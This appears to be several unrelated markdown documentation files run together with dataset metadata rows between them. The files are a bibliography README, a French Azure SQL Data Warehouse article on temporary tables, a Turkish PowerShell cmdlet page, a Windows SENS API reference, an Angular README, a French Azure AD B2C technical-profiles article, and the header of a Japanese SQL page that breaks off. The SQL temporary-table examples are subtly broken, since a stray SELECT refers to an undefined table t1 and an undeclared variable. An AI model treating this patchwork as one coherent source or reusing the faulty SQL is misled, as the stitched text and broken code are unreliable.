# Light-Transport-Bibliography A bibtex bibliography of papers, books and theses focusing on the topic of Light Transport Simulation. ### Usage The bibliography can be used in LaTeX as any other would: ``` % in header of main.tex \usepackage[backend=biber, style=ieee]{biblatex} \addbibresource{lib_Books.bib} \addbibresource{lib_Papers.bib} ... % document contents ... \printbibliography ``` ### Style This bibtex library for Light Transport Simulation combines the citation key style and the convenience of Google Scholar, with the entry completeness provided by other digital libraries. Most of the entries featured in this library were extracted from the ACM Digital Library, the Wiley Online Library, and Springer Link. A few entries were created/modified by hand to fix issues and mistakes. A custom script was used to ensure that all entries were formatted in the same style (e.g. indentations, braces), which allows for better visual parsing. In this library, braces are used instead of quotation marks; to avoid dependency on the automatic expansion, all *month* entries are given as integers. In general, we seek to embed as much information as possible into each entry; however, we do deliberately omit the abstract of each paper. ### Collaboration In case you notice any errors, inaccuracies or missing information please let me know via an issue! The same holds if you think that there are important papers missing. I'm very happy to add entries given that they are related to the topic. It may just take me a few days to read the suggested paper.
68
699
0.794118
eng_Latn
0.997707
5389872103f891625a962f34ac769a10c8301229
10,790
md
Markdown
articles/sql-data-warehouse/sql-data-warehouse-tables-temporary.md
CatchRetry/azure-docs.fr-fr
1ccd071caa483cc19d4d9b8c1c59104b1a7e6438
[ "CC-BY-4.0" ]
null
null
null
articles/sql-data-warehouse/sql-data-warehouse-tables-temporary.md
CatchRetry/azure-docs.fr-fr
1ccd071caa483cc19d4d9b8c1c59104b1a7e6438
[ "CC-BY-4.0" ]
null
null
null
articles/sql-data-warehouse/sql-data-warehouse-tables-temporary.md
CatchRetry/azure-docs.fr-fr
1ccd071caa483cc19d4d9b8c1c59104b1a7e6438
[ "CC-BY-4.0" ]
3
2020-03-31T11:56:12.000Z
2021-06-04T06:51:19.000Z
--- title: Tables temporaires dans SQL Data Warehouse | Microsoft Docs description: Conseils de base pour l’utilisation des tables temporaires et mise en évidence des principes des tables temporaires au niveau de la session. services: sql-data-warehouse author: ronortloff manager: craigg ms.service: sql-data-warehouse ms.topic: conceptual ms.subservice: implement ms.date: 04/17/2018 ms.author: rortloff ms.reviewer: igorstan ms.openlocfilehash: db13064c93381f87f82959ed3386abfc0a8e4593 ms.sourcegitcommit: 898b2936e3d6d3a8366cfcccc0fccfdb0fc781b4 ms.translationtype: HT ms.contentlocale: fr-FR ms.lasthandoff: 01/30/2019 ms.locfileid: "55238660" --- # <a name="temporary-tables-in-sql-data-warehouse"></a>Tables temporaires dans SQL Data Warehouse Cet article contient des conseils de base pour l’utilisation des tables temporaires et met en évidence les principes des tables temporaires au niveau de la session. L’utilisation des informations de cet article peut vous aider à modulariser votre code, et à améliorer sa réutilisabilité et sa facilité de maintenance. ## <a name="what-are-temporary-tables"></a>Qu’est-ce que les tables temporaires ? Les tables temporaires sont utiles lors du traitement des données, notamment lors d’une transformation, lorsque les résultats intermédiaires sont temporaires. Les tables temporaires se trouvent au niveau de la session dans SQL Data Warehouse. Elles sont uniquement visibles dans la session dans laquelle elles ont été créées et sont automatiquement supprimées lorsque cette session se déconnecte. Les tables temporaires offrent un gain de performances, car leurs résultats sont écrits en local et non dans un stockage distant. Dans Azure SQL Data Warehouse, les tables temporaires diffèrent légèrement par rapport à la base de données SQL Azure, car elles sont accessibles à partir de tout point à l’intérieur de la session, notamment à l’intérieur et à l’extérieur d’une procédure stockée. ## <a name="create-a-temporary-table"></a>Créer une table temporaire Les tables temporaires sont créées en faisant simplement précéder le nom de votre table de `#`. 
Par exemple : ```sql CREATE TABLE #stats_ddl ( [schema_name] NVARCHAR(128) NOT NULL , [table_name] NVARCHAR(128) NOT NULL , [stats_name] NVARCHAR(128) NOT NULL , [stats_is_filtered] BIT NOT NULL , [seq_nmbr] BIGINT NOT NULL , [two_part_name] NVARCHAR(260) NOT NULL , [three_part_name] NVARCHAR(400) NOT NULL ) WITH ( DISTRIBUTION = HASH([seq_nmbr]) , HEAP ) ``` Vous pouvez également utiliser `CTAS` pour créer des tables temporaires à l’aide de la même approche : ```sql CREATE TABLE #stats_ddl WITH ( DISTRIBUTION = HASH([seq_nmbr]) , HEAP ) AS ( SELECT sm.[name] AS [schema_name] , tb.[name] AS [table_name] , st.[name] AS [stats_name] , st.[has_filter] AS [stats_is_filtered] , ROW_NUMBER() OVER(ORDER BY (SELECT NULL)) AS [seq_nmbr] , QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [two_part_name] , QUOTENAME(DB_NAME())+'.'+QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [three_part_name] FROM sys.objects AS ob JOIN sys.stats AS st ON ob.[object_id] = st.[object_id] JOIN sys.stats_columns AS sc ON st.[stats_id] = sc.[stats_id] AND st.[object_id] = sc.[object_id] JOIN sys.columns AS co ON sc.[column_id] = co.[column_id] AND sc.[object_id] = co.[object_id] JOIN sys.tables AS tb ON co.[object_id] = tb.[object_id] JOIN sys.schemas AS sm ON tb.[schema_id] = sm.[schema_id] WHERE 1=1 AND st.[user_created] = 1 GROUP BY sm.[name] , tb.[name] , st.[name] , st.[filter_definition] , st.[has_filter] ) SELECT CASE @update_type WHEN 1 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+');' WHEN 2 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH FULLSCAN;' WHEN 3 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH SAMPLE '+CAST(@sample_pct AS VARCHAR(20))+' PERCENT;' WHEN 4 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH RESAMPLE;' END AS [update_stats_ddl] , [seq_nmbr] FROM t1 ; ``` > [!NOTE] > `CTAS` est une commande puissante et présente l’avantage d’être efficace dans son utilisation de l’espace de journal des transactions. > > ## <a name="dropping-temporary-tables"></a>Suppression de tables temporaires Lorsqu’une nouvelle session est créée, aucune table temporaire ne doit exister. Toutefois, si vous appelez la même procédure stockée, qui crée une table temporaire avec le même nom, pour vous assurer de la réussite de vos instructions `CREATE TABLE`, une simple vérification d’existence préalable avec `DROP` peut être utilisée comme dans l’exemple suivant : ```sql IF OBJECT_ID('tempdb..#stats_ddl') IS NOT NULL BEGIN DROP TABLE #stats_ddl END ``` Pour la cohérence de codage, il convient d’utiliser ce modèle pour les tables et les tables temporaires. Il est également judicieux d’utiliser `DROP TABLE` pour supprimer les tables temporaires lorsque vous avez terminé de les utiliser dans votre code. Dans le développement de procédure stockée, il est courant de voir les commandes de suppression regroupées ensemble à la fin d’une procédure pour s’assurer que ces objets sont nettoyés. ```sql DROP TABLE #stats_ddl ``` ## <a name="modularizing-code"></a>Modularisation du code Étant donné que les tables temporaires peuvent être affichées depuis n’importe quel point d’une session utilisateur, cela peut vous aider à modulariser votre code d’application. Par exemple, la procédure stockée suivante génère le langage DDL pour mettre à jour toutes les statistiques dans la base de données par nom de statistique. 
```sql CREATE PROCEDURE [dbo].[prc_sqldw_update_stats] ( @update_type tinyint -- 1 default 2 fullscan 3 sample 4 resample ,@sample_pct tinyint ) AS IF @update_type NOT IN (1,2,3,4) BEGIN; THROW 151000,'Invalid value for @update_type parameter. Valid range 1 (default), 2 (fullscan), 3 (sample) or 4 (resample).',1; END; IF @sample_pct IS NULL BEGIN; SET @sample_pct = 20; END; IF OBJECT_ID('tempdb..#stats_ddl') IS NOT NULL BEGIN DROP TABLE #stats_ddl END CREATE TABLE #stats_ddl WITH ( DISTRIBUTION = HASH([seq_nmbr]) ) AS ( SELECT sm.[name] AS [schema_name] , tb.[name] AS [table_name] , st.[name] AS [stats_name] , st.[has_filter] AS [stats_is_filtered] , ROW_NUMBER() OVER(ORDER BY (SELECT NULL)) AS [seq_nmbr] , QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [two_part_name] , QUOTENAME(DB_NAME())+'.'+QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [three_part_name] FROM sys.objects AS ob JOIN sys.stats AS st ON ob.[object_id] = st.[object_id] JOIN sys.stats_columns AS sc ON st.[stats_id] = sc.[stats_id] AND st.[object_id] = sc.[object_id] JOIN sys.columns AS co ON sc.[column_id] = co.[column_id] AND sc.[object_id] = co.[object_id] JOIN sys.tables AS tb ON co.[object_id] = tb.[object_id] JOIN sys.schemas AS sm ON tb.[schema_id] = sm.[schema_id] WHERE 1=1 AND st.[user_created] = 1 GROUP BY sm.[name] , tb.[name] , st.[name] , st.[filter_definition] , st.[has_filter] ) SELECT CASE @update_type WHEN 1 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+');' WHEN 2 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH FULLSCAN;' WHEN 3 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH SAMPLE '+CAST(@sample_pct AS VARCHAR(20))+' PERCENT;' WHEN 4 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH RESAMPLE;' END AS [update_stats_ddl] , [seq_nmbr] FROM t1 ; GO ``` À ce stade, la seule action qui s’est produite est la création d’une procédure stockée qui génére une table temporaire, #stats_ddl, avec des instructions DDL. Cette procédure stockée abandonne la table #stats_ddl si elle existe déjà pour assurer l’absence d’échec en cas d’exécutions multiples dans une session. Toutefois, étant donné l’absence de `DROP TABLE` à la fin de la procédure stockée, lorsque la procédure stockée se termine, elle quitte la table créée afin de pouvoir être lue en dehors de la procédure stockée. Dans SQL Data Warehouse, contrairement à d’autres bases de données SQL, il est possible d’utiliser la table temporaire en dehors de la procédure qui l’a créée. Les tables temporaires SQL Data Warehouse peuvent être utilisées à **n’importe quel point** de la session. Cela peut optimiser la facilité de gestion et la modularité du code comme dans l’exemple suivant : ```sql EXEC [dbo].[prc_sqldw_update_stats] @update_type = 1, @sample_pct = NULL; DECLARE @i INT = 1 , @t INT = (SELECT COUNT(*) FROM #stats_ddl) , @s NVARCHAR(4000) = N'' WHILE @i <= @t BEGIN SET @s=(SELECT update_stats_ddl FROM #stats_ddl WHERE seq_nmbr = @i); PRINT @s EXEC sp_executesql @s SET @i+=1; END DROP TABLE #stats_ddl; ``` ## <a name="temporary-table-limitations"></a>Limitations relatives aux tables temporaires SQL Data Warehouse impose quelques restrictions lors de l’implémentation de tables temporaires. Actuellement, seules les tables temporaires de la session sont prises en charge. Les tables temporaires globales ne sont pas prises en charge. En outre, vous ne pouvez pas créer de vues sur des tables temporaires. 
## <a name="next-steps"></a>Étapes suivantes Pour en savoir plus sur le développement des tables, consultez la [Vue d’ensemble de la Table](sql-data-warehouse-tables-overview.md).
48.38565
892
0.646061
fra_Latn
0.617307
53899be6c675d479a1fd0967a999ea217465025c
3,143
md
Markdown
azps-3.8.0/Az.Network/New-AzApplicationGatewayFirewallPolicyManagedRule.md
AdrianaDJ/azure-docs-powershell.tr-TR
78407d14f64e877506d6c0c14cac18608332c7a8
[ "CC-BY-4.0", "MIT" ]
1
2020-12-05T17:58:35.000Z
2020-12-05T17:58:35.000Z
azps-3.8.0/Az.Network/New-AzApplicationGatewayFirewallPolicyManagedRule.md
AdrianaDJ/azure-docs-powershell.tr-TR
78407d14f64e877506d6c0c14cac18608332c7a8
[ "CC-BY-4.0", "MIT" ]
null
null
null
azps-3.8.0/Az.Network/New-AzApplicationGatewayFirewallPolicyManagedRule.md
AdrianaDJ/azure-docs-powershell.tr-TR
78407d14f64e877506d6c0c14cac18608332c7a8
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- external help file: Microsoft.Azure.PowerShell.Cmdlets.Network.dll-Help.xml Module Name: Az.Network online version: https://docs.microsoft.com/en-us/powershell/module/az.network/new-azapplicationgatewayfirewallpolicymanagedrule schema: 2.0.0 content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/Network/Network/help/New-AzApplicationGatewayFirewallPolicyManagedRule.md original_content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/Network/Network/help/New-AzApplicationGatewayFirewallPolicyManagedRule.md ms.openlocfilehash: 6b709283024a37d85bfac89f7e2fec4448544729 ms.sourcegitcommit: 6a91b4c545350d316d3cf8c62f384478e3f3ba24 ms.translationtype: MT ms.contentlocale: tr-TR ms.lasthandoff: 04/21/2020 ms.locfileid: "94104816" --- # New-AzApplicationGatewayFirewallPolicyManagedRule ## SYNOPSIS Güvenlik duvarı ilkesi için ManagedRules oluşturma. ## INDEKI ``` New-AzApplicationGatewayFirewallPolicyManagedRule [-ManagedRuleSet <PSApplicationGatewayFirewallPolicyManagedRuleSet[]>] [-Exclusion <PSApplicationGatewayFirewallPolicyExclusion[]>] [-DefaultProfile <IAzureContextContainer>] [<CommonParameters>] ``` ## Tanım **Yeni-AzApplicationGatewayFirewallPolicyManagedRule** , güvenlik duvarı ilkesi için yönetilen kurallar oluşturur. ## ÖRNEKLERDEN ### Örnek 1 ```powershell PS C:\> $condition = New-AzApplicationGatewayFirewallPolicyManagedRule -ManagedRuleSet $managedRuleSet -Exclusion $exclusion1,$exclusion2 ``` Bu komut, $managedRuleSet içeren bir ManagedRuleSet listesi ve girdileri $exclusion 1, $exclusion 2 olan bir dışlama listesi oluşturur. ## PARAMETRELERINE ### -DefaultProfile Azure ile iletişim için kullanılan kimlik bilgileri, hesap, kiracı ve abonelik. ```yaml Type: Microsoft.Azure.Commands.Common.Authentication.Abstractions.Core.IAzureContextContainer Parameter Sets: (All) Aliases: AzContext, AzureRmContext, AzureCredential Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Dışlama Dışlama girdisinin listesi. ```yaml Type: Microsoft.Azure.Commands.Network.Models.PSApplicationGatewayFirewallPolicyExclusion[] Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -ManagedRuleSet Yönetilen ruleSets 'in listesi. ```yaml Type: Microsoft.Azure.Commands.Network.Models.PSApplicationGatewayFirewallPolicyManagedRuleSet[] Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters Bu cmdlet ortak parametreleri destekler:-Debug,-ErrorAction,-ErrorVariable,-ınformationaction,-ınformationvariable,-OutVariable,-OutBuffer,-Pipelinedeğişken,-verbose,-WarningAction ve-Warningdeğişken. Daha fazla bilgi için [about_CommonParameters](http://go.microsoft.com/fwlink/?LinkID=113216)bakın. ## GÖLGELENDIRICI ### Yabilirsiniz ## ÇıKıŞLAR ### Microsoft. Azure. Commands. Network. modeller. PSApplicationGatewayFirewallPolicyManagedRules ## NOTLARıNDA ## ILGILI BAĞLANTıLAR
30.813725
300
0.821508
yue_Hant
0.439342
538aa77409c2ae8935be00349d98ae448d4c1cf4
3,063
md
Markdown
sdk-api-src/content/sensevts/nf-sensevts-isenslogon2-sessionreconnect.md
amorilio/sdk-api
54ef418912715bd7df39c2561fbc3d1dcef37d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
sdk-api-src/content/sensevts/nf-sensevts-isenslogon2-sessionreconnect.md
amorilio/sdk-api
54ef418912715bd7df39c2561fbc3d1dcef37d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
sdk-api-src/content/sensevts/nf-sensevts-isenslogon2-sessionreconnect.md
amorilio/sdk-api
54ef418912715bd7df39c2561fbc3d1dcef37d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- UID: NF:sensevts.ISensLogon2.SessionReconnect title: ISensLogon2::SessionReconnect (sensevts.h) description: The session was reconnected. The SessionReconnect method is used when you reconnect to a Fast User Switching session or a Remote Desktop Connection. This is different from logging on to a new session. helpviewer_keywords: ["ISensLogon2 interface [SENS]","SessionReconnect method","ISensLogon2.SessionReconnect","ISensLogon2::SessionReconnect","SessionReconnect","SessionReconnect method [SENS]","SessionReconnect method [SENS]","ISensLogon2 interface","_zaw_isenslogon2_sessionreconnect","sens.isenslogon2_sessionreconnect","sensevts/ISensLogon2::SessionReconnect","syncmgr.isenslogon2_sessionreconnect"] old-location: sens\isenslogon2_sessionreconnect.htm tech.root: Sens ms.assetid: b789a75d-e842-40b4-9e8d-b9374b5ba6b0 ms.date: 12/05/2018 ms.keywords: ISensLogon2 interface [SENS],SessionReconnect method, ISensLogon2.SessionReconnect, ISensLogon2::SessionReconnect, SessionReconnect, SessionReconnect method [SENS], SessionReconnect method [SENS],ISensLogon2 interface, _zaw_isenslogon2_sessionreconnect, sens.isenslogon2_sessionreconnect, sensevts/ISensLogon2::SessionReconnect, syncmgr.isenslogon2_sessionreconnect req.header: sensevts.h req.include-header: req.target-type: Windows req.target-min-winverclnt: Windows XP [desktop apps only] req.target-min-winversvr: Windows Server 2003 [desktop apps only] req.kmdf-ver: req.umdf-ver: req.ddi-compliance: req.unicode-ansi: req.idl: req.max-support: req.namespace: req.assembly: req.type-library: Sensevts.tlb req.lib: req.dll: Sens.dll req.irql: targetos: Windows req.typenames: req.redist: ms.custom: 19H1 f1_keywords: - ISensLogon2::SessionReconnect - sensevts/ISensLogon2::SessionReconnect dev_langs: - c++ topic_type: - APIRef - kbSyntax api_type: - COM api_location: - Sens.dll api_name: - ISensLogon2.SessionReconnect --- # ISensLogon2::SessionReconnect ## -description The session was reconnected. The <b>SessionReconnect</b> method is used when you reconnect to a Fast User Switching session or a Remote Desktop Connection. This is different from logging on to a new session. ## -parameters ### -param bstrUserName [in] Name of the current user. ### -param dwSessionId [in] The session identifier of the session. ## -returns This method can return one of these values. <table> <tr> <th>Return code</th> <th>Description</th> </tr> <tr> <td width="40%"> <dl> <dt><b>S_OK</b></dt> </dl> </td> <td width="60%"> Method returned successfully. </td> </tr> </table> ## -remarks SENS calls this method to notify your application that the session was reconnected. ## -see-also <a href="/windows/desktop/Sens/about-system-event-notification-service">About System Event Notification Service</a> <a href="/windows/desktop/api/sensevts/nn-sensevts-isenslogon2">ISensLogon2</a> <a href="/windows/desktop/api/sensevts/nf-sensevts-isenslogon-logoff">ISensLogon::Logoff</a> <a href="/windows/desktop/TermServ/terminal-services-portal">Terminal Services</a>
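Because this page documents only the notification signature, here is a hedged C++ sketch of the work a SENS sink might do when this method fires. It is written as a free function so the fragment stands alone; a real sink must implement the full <b>ISensLogon2</b> interface (including <b>IDispatch</b>) and subscribe through the COM+ Event System, all of which is omitted here as an assumption about the surrounding code.

```cpp
#include <windows.h>
#include <stdio.h>

// Hypothetical body for ISensLogon2::SessionReconnect, shown as a free
// function so the snippet compiles without the IUnknown/IDispatch plumbing
// of a complete SENS event sink.
HRESULT OnSessionReconnect(BSTR bstrUserName, DWORD dwSessionId)
{
    // bstrUserName: name of the current user; dwSessionId: reconnected session.
    wprintf(L"Session %lu reconnected for user %s\n",
            dwSessionId, bstrUserName ? bstrUserName : L"(unknown)");

    // Typical reactions here: refresh per-session state, re-query device or
    // network status, or resume work that was deferred for this session.
    return S_OK; // Report success back to SENS.
}
```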
28.896226
403
0.78224
eng_Latn
0.549706
538aea0a0100eeaa6d476657d350ee115c830326
233
md
Markdown
README.md
lestatleon/fs_front
7820948e4c1440af3b3af13645cbc0780391dc3c
[ "MIT" ]
null
null
null
README.md
lestatleon/fs_front
7820948e4c1440af3b3af13645cbc0780391dc3c
[ "MIT" ]
null
null
null
README.md
lestatleon/fs_front
7820948e4c1440af3b3af13645cbc0780391dc3c
[ "MIT" ]
null
null
null
# FrontEnd project

## About Front

This front-end application was developed entirely with Angular 5.

## License

This front-end project is open-source software licensed under the [MIT license](http://opensource.org/licenses/MIT).
19.416667
116
0.785408
eng_Latn
0.992531
538b9a7f39c24fcae444e91208ddc73a5efb3b1b
11,730
md
Markdown
articles/active-directory-b2c/technical-profiles-overview.md
eltociear/azure-docs.fr-fr
3302b8be75f0872cf7d7a5e264850849ac36e493
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/active-directory-b2c/technical-profiles-overview.md
eltociear/azure-docs.fr-fr
3302b8be75f0872cf7d7a5e264850849ac36e493
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/active-directory-b2c/technical-profiles-overview.md
eltociear/azure-docs.fr-fr
3302b8be75f0872cf7d7a5e264850849ac36e493
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Overview of technical profiles in custom policies
titleSuffix: Azure AD B2C
description: Learn how technical profiles are used in a custom policy in Azure Active Directory B2C.
services: active-directory-b2c
author: msmimart
manager: celestedg

ms.service: active-directory
ms.workload: identity
ms.topic: reference
ms.date: 03/20/2020
ms.author: mimart
ms.subservice: B2C
ms.openlocfilehash: 125d89301e9d2cc3fc863bffb9b9e6c41e0c129e
ms.sourcegitcommit: 58faa9fcbd62f3ac37ff0a65ab9357a01051a64f
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 04/28/2020
ms.locfileid: "82229933"
---
# <a name="about-technical-profiles-in-azure-active-directory-b2c-custom-policies"></a>About technical profiles in Azure Active Directory B2C custom policies

[!INCLUDE [active-directory-b2c-advanced-audience-warning](../../includes/active-directory-b2c-advanced-audience-warning.md)]

A technical profile provides a framework with a built-in mechanism to communicate with different types of parties using a custom policy in Azure Active Directory B2C (Azure AD B2C). Technical profiles are used to communicate with your Azure AD B2C tenant, to create a user, or to read a user profile. A technical profile can be self-asserted to enable interaction with the user. For example, collecting the user's credentials to sign in, then rendering the sign-up page or the password reset page.

## <a name="type-of-technical-profiles"></a>Types of technical profiles

A technical profile enables these types of scenarios:

- [Application Insights](application-insights-technical-profile.md) - Sends event data to [Application Insights](../azure-monitor/app/app-insights-overview.md).
- [Azure Active Directory](active-directory-technical-profile.md) - Provides support for Azure Active Directory B2C user management.
- [Azure Multi-Factor Authentication](multi-factor-auth-technical-profile.md) - Handles verifying a phone number with Azure Multi-Factor Authentication (MFA).
- [Claims transformation](claims-transformation-technical-profile.md) - Invokes output claims transformations to manipulate claim values, validate claims, or set default values for a set of output claims.
- [JWT token issuer](jwt-issuer-technical-profile.md) - Issues a JWT token that is returned to the relying party application.
- [OAuth1](oauth1-technical-profile.md) - Federation with any OAuth 1.0 protocol identity provider.
- [OAuth2](oauth2-technical-profile.md) - Federation with any OAuth 2.0 protocol identity provider.
- [One-time password](one-time-password-technical-profile.md) - Provides support for managing the generation and verification of a one-time password.
- [OpenID Connect](openid-connect-technical-profile.md) - Federation with any OpenID Connect protocol identity provider.
- [Phone factor](phone-factor-technical-profile.md) - Support for enrolling and verifying phone numbers.
- [RESTful provider](restful-technical-profile.md) - Calls REST API services, such as validating user input, enriching user data, or integrating with line-of-business applications.
- [SAML identity provider](saml-identity-provider-technical-profile.md) - Federation with any SAML protocol identity provider.
- [SAML token issuer](saml-issuer-technical-profile.md) - Issues a SAML token that is returned to the relying party application.
- [Self-asserted](self-asserted-technical-profile.md) - Interaction with the user. For example, collecting the user's credentials to sign in, rendering the sign-up page, or handling password reset.
- [Session management](custom-policy-reference-sso.md) - Handles different types of sessions.

## <a name="technical-profile-flow"></a>Technical profile flow

All types of technical profiles share the same concept. You send input claims, run claims transformations, and communicate with the configured party, such as an identity provider, a REST API, or Azure AD directory services. After the process completes, the technical profile returns the output claims and may run output claims transformations. The following diagram shows how the transformations and mappings referenced in the technical profile are processed. Regardless of the party the technical profile interacts with, after the claims transformations run, the output claims of the technical profile are immediately stored in the claims bag.

![Diagram illustrating the technical profile flow](./media/technical-profiles-overview/technical-profile-idp-saml-flow.png)

1. **Single sign-on (SSO) session management** - Restores the technical profile's session state, using [SSO session management](custom-policy-reference-sso.md).
1. **Input claims transformations** - The input claims of each input [claims transformation](claimstransformations.md) are retrieved from the claims bag. The output claims of an input claims transformation can be input claims of a subsequent input claims transformation.
1. **Input claims** - Claims are retrieved from the claims bag and are used for the technical profile. For example, a [self-asserted technical profile](self-asserted-technical-profile.md) uses the input claims to prefill the output claims the user provides. A REST API technical profile uses the input claims to send input parameters to the REST API endpoint. Azure Active Directory uses an input claim as a unique identifier to read, update, or delete an account.
1. **Technical profile execution** - The technical profile exchanges the claims with the configured party. For example:
    - Redirect the user to the identity provider to complete the sign-in. After successful sign-in, the user returns and the technical profile execution continues.
    - Call a REST API while sending parameters as InputClaims and getting back information as OutputClaims.
    - Create or update the user account.
    - Send and verify the MFA text message.
1. **Validation technical profiles** - A [self-asserted technical profile](self-asserted-technical-profile.md) can call [validation technical profiles](validation-technical-profile.md). The validation technical profile validates the user-provided data and returns an error message or OK, with or without output claims. For example, before Azure AD B2C creates a new account, it checks whether the user already exists in the directory services. You can call a REST API technical profile to add your own business logic.<p>The scope of the output claims of a validation technical profile is limited to the technical profile that invokes the validation technical profile, and the other validation technical profiles under the same technical profile. If you want to use the output claims in the next orchestration step, add the output claims to the technical profile that invokes the validation technical profile.
1. **Output claims** - Claims are returned to the claims bag. You can use those claims in the next orchestration step, or in the output claims transformations.
1. **Output claims transformations** - The input claims of each output [claims transformation](claimstransformations.md) are retrieved from the claims bag. The output claims of the technical profile from the earlier steps can be input claims of an output claims transformation. After execution, the output claims are put back into the claims bag. The output claims of an output claims transformation can also be input claims of a subsequent output claims transformation.
1. **Single sign-on (SSO) session management** - Persists the technical profile's data to the session, using [SSO session management](custom-policy-reference-sso.md).

## <a name="technical-profile-inclusion"></a>Technical profile inclusion

A technical profile can include another technical profile to change settings or add new functionality. The `IncludeTechnicalProfile` element is a reference to the base technical profile from which a technical profile is derived. There is no limit on the number of inclusion levels.

For example, the **AAD-UserReadUsingAlternativeSecurityId-NoError** technical profile includes **AAD-UserReadUsingAlternativeSecurityId**. That technical profile sets the `RaiseErrorIfClaimsPrincipalDoesNotExist` metadata item to `true`, and raises an error if a social account does not exist in the directory. **AAD-UserReadUsingAlternativeSecurityId-NoError** overrides that behavior and disables that error message.

```XML
<TechnicalProfile Id="AAD-UserReadUsingAlternativeSecurityId-NoError">
  <Metadata>
    <Item Key="RaiseErrorIfClaimsPrincipalDoesNotExist">false</Item>
  </Metadata>
  <IncludeTechnicalProfile ReferenceId="AAD-UserReadUsingAlternativeSecurityId" />
</TechnicalProfile>
```

**AAD-UserReadUsingAlternativeSecurityId** includes the `AAD-Common` technical profile.

```XML
<TechnicalProfile Id="AAD-UserReadUsingAlternativeSecurityId">
  <Metadata>
    <Item Key="Operation">Read</Item>
    <Item Key="RaiseErrorIfClaimsPrincipalDoesNotExist">true</Item>
    <Item Key="UserMessageIfClaimsPrincipalDoesNotExist">User does not exist. Please sign up before you can sign in.</Item>
  </Metadata>
  <InputClaims>
    <InputClaim ClaimTypeReferenceId="AlternativeSecurityId" PartnerClaimType="alternativeSecurityId" Required="true" />
  </InputClaims>
  <OutputClaims>
    <OutputClaim ClaimTypeReferenceId="objectId" />
    <OutputClaim ClaimTypeReferenceId="userPrincipalName" />
    <OutputClaim ClaimTypeReferenceId="displayName" />
    <OutputClaim ClaimTypeReferenceId="otherMails" />
    <OutputClaim ClaimTypeReferenceId="givenName" />
    <OutputClaim ClaimTypeReferenceId="surname" />
  </OutputClaims>
  <IncludeTechnicalProfile ReferenceId="AAD-Common" />
</TechnicalProfile>
```

Neither **AAD-UserReadUsingAlternativeSecurityId-NoError** nor **AAD-UserReadUsingAlternativeSecurityId** specifies the required **Protocol** element, because it's specified in the **AAD-Common** technical profile.

```XML
<TechnicalProfile Id="AAD-Common">
  <DisplayName>Azure Active Directory</DisplayName>
  <Protocol Name="Proprietary" Handler="Web.TPEngine.Providers.AzureActiveDirectoryProvider, Web.TPEngine, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
  ...
</TechnicalProfile>
```
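As a hedged illustration of the validation step in the flow above, the sketch below shows a self-asserted technical profile that invokes a validation technical profile. The profile IDs and the claim list are illustrative assumptions rather than a prescribed configuration (the referenced `login-NonInteractive` profile name follows common starter-pack naming):

```XML
<!-- Hypothetical sketch: a self-asserted sign-in page that calls a
     validation technical profile before its output claims are kept. -->
<TechnicalProfile Id="SelfAsserted-LocalAccountSignin-Example">
  <DisplayName>Local Account Signin</DisplayName>
  <Protocol Name="Proprietary" Handler="Web.TPEngine.Providers.SelfAssertedAttributeProvider, Web.TPEngine, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
  <InputClaims>
    <InputClaim ClaimTypeReferenceId="signInName" />
  </InputClaims>
  <OutputClaims>
    <OutputClaim ClaimTypeReferenceId="signInName" Required="true" />
    <OutputClaim ClaimTypeReferenceId="password" Required="true" />
    <!-- objectId comes back from the validation technical profile; it must be
         listed here to be usable in the next orchestration step. -->
    <OutputClaim ClaimTypeReferenceId="objectId" />
  </OutputClaims>
  <ValidationTechnicalProfiles>
    <!-- Runs first; on error, the page is redisplayed with the returned message. -->
    <ValidationTechnicalProfile ReferenceId="login-NonInteractive" />
  </ValidationTechnicalProfiles>
</TechnicalProfile>
```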
102
1,029
0.808781
fra_Latn
0.932519
538bdb0dc4b28fed8211df5c05024cf2e6fd5bdc
3,184
md
Markdown
docs/relational-databases/performance/create-a-plan-guide-for-parameterized-queries.md
masashimi/sql-docs.ja-jp
8d7b348348f377b8b1621da72311554cfd003fae
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/relational-databases/performance/create-a-plan-guide-for-parameterized-queries.md
masashimi/sql-docs.ja-jp
8d7b348348f377b8b1621da72311554cfd003fae
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/relational-databases/performance/create-a-plan-guide-for-parameterized-queries.md
masashimi/sql-docs.ja-jp
8d7b348348f377b8b1621da72311554cfd003fae
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Create a plan guide for parameterized queries | Microsoft Docs
ms.custom: ''
ms.date: 03/14/2017
ms.prod: sql
ms.reviewer: ''
ms.suite: sql
ms.technology: performance
ms.tgt_pltfrm: ''
ms.topic: conceptual
helpviewer_keywords:
- parameterized queries, plan guides for
- plan guides [SQL Server], parameterized queries
ms.assetid: b532ae16-66e7-4641-9bc8-b0d805853477
caps.latest.revision: 6
author: MikeRayMSFT
